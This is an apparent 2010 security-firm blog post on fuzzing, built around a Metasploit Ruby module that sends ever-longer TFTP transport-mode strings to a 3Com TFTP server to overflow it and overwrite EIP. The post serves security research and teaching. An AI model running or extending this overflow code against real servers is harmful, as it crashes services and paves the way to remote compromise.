RedTeam Labs

Information Security Vulnerablities, Exploit Code and News

CATEGORIES:      Company News General Industry News Research List View

Fuzzing with Metasploit

Category: Research Tags: metasploit, fuzzer, fuzzing, tftp,
Posted by: labs@redteamsecure.com (Jeremiah Talamantes) on 2010-04-07 15:01:39

We are big fans of the Metasploit Framework and its capabilities. The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

What I love best about Metasploit is its vast library of code. But what common users don't realize is that existing sploits can be easily modified to suit your pen testing needs. So for those budding security researchers, check out the Metasploit archive.

Let's take this sample code used from another sploit that was modified to fuzz 3Com TFTP server on Windows. The following code will send overly long bytes to the transport mode and finally overwrite EIP. It can be easily modified to your liking. Exploits are written in Ruby but don't be discouraged if you're not a programmer. There are plenty of tutorials that can help you along the way.

Enjoy!



# Metasploit Framework

#

#

# 3Com TFTP Fuzzer

#

# Jeremiah Talamantes, RedTeam Security

# http://www.redteamsecure.com

#

# FOR EDUCATIONAL PURPOSES ONLY!

# PLEASE USE RESPONSIBLY

#



require 'msf/core'

class Metasploit3 < Msf::Auxiliary

        include Msf::Auxiliary::Scanner

        def initialize

                super(

                        'Name'           => '3Com TFTP Fuzzer',

                        'Version'        => '$Revision: 1 $',

                        'Description'    => '3Com TFTP Fuzzer Passes Overly Long Transport Mode String',

                        'Author'         => 'Jeremiah Talamantes - RedTeam Security',

                        'License'        => MSF_LICENSE

                )

                register_options( [

                Opt::RPORT(69)

                ], self.class)

        end

        def run_host(ip)

                # Create an unbound UDP socket

                udp_sock = Rex::Socket::Udp.create(

                        'Context'   =>

                                {

                                        'Msf'        => framework,

                                        'MsfExploit' => self,

                                }

                )

                count = 10  # Set an initial count

                while count < 2000  # While the count is under 2000 run

                        evil = "A" * count  # Set a number of "A"s equal to count

                        pkt = "\x00\x02" + "\x41" + "\x00" + evil + "\x00"  # Define the payload

                        udp_sock.sendto(pkt, ip, datastore['RPORT'])  # Send the packet

                        print_status("Sending: #{evil}")  # Status update

                        resp = udp_sock.get(1)  # Capture the response

                        count += 10  # Increase count by 10, and loop

                end

        end

end



Share |



Follow Our Twitter

Follow Our RSS

Share this: |


Categories



DISCLAIMER
    The content, tools, methodologies and proof of concept code contained in these articles are in no way intended to be used for malicious intent. This information is to be used for educational purposes only. RedTeam Security does not condone the malicious use nor does it warranty the use of any of the content contained herein.


Contact Us

Phone number:
1-612-234-7848

E-mail:

info@redteamsecure.com